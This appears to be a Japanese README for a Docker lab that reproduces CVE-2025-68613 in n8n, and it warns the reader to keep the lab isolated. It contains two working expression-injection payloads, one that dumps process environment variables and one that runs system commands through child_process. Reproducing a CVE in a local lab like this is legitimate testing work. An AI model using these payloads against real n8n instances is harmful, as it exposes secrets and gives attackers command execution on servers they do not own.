このリポジトリは、CVE-2025-68613 をローカルでテストするための脆弱な n8n インスタンスを実行する、シンプルな Docker Compose セットアップを提供します。
コンテナを起動します:
docker compose up -d
ブラウザで n8n を開きます:
docker-compose.yml で設定されているデフォルトの認証情報でログインします:
adminpassworddocker compose down
この環境はローカルでの隔離テスト専用です。このインスタンスをパブリックインターネットや信頼できないネットワークに公開しないでください。プライベートでローカルのみのネットワークセグメントに維持し、本番システムから分離してください。自己責任で使用してください。
コンテナが起動したら、http://localhost:5678 で n8n インターフェースにアクセスできます。脆弱性をテストするには、悪意のある JavaScript ペイロードを式フィールドに注入します。
再現手順:
テスト 1:環境変数の外部送信 このペイロードは、多くの場合シークレットを含むプロセス環境変数へのアクセスを試みます。
{{ (function() { return this.process.env; })() }}

テスト 2:リモートコード実行(RCE) このペイロードは、child_process モジュールをロードしてシステムコマンド(例:whoami)を実行しようとします。
{{ (function() {
var require = this.process.mainModule.require;
var execSync = require('child_process').execSync;
return execSync('whoami').toString();
})() }}

期待される結果:環境が脆弱な場合、「Set」ノードの「Output」パネルにコマンドの結果(例:root または n8n ユーザー)や、環境変数を含む JSON オブジェクトが表示されます。インスタンスがパッチ適用済みの場合(例:バージョン 1.122.0+)、サンドボックスは空のオブジェクトまたはエラーを返します。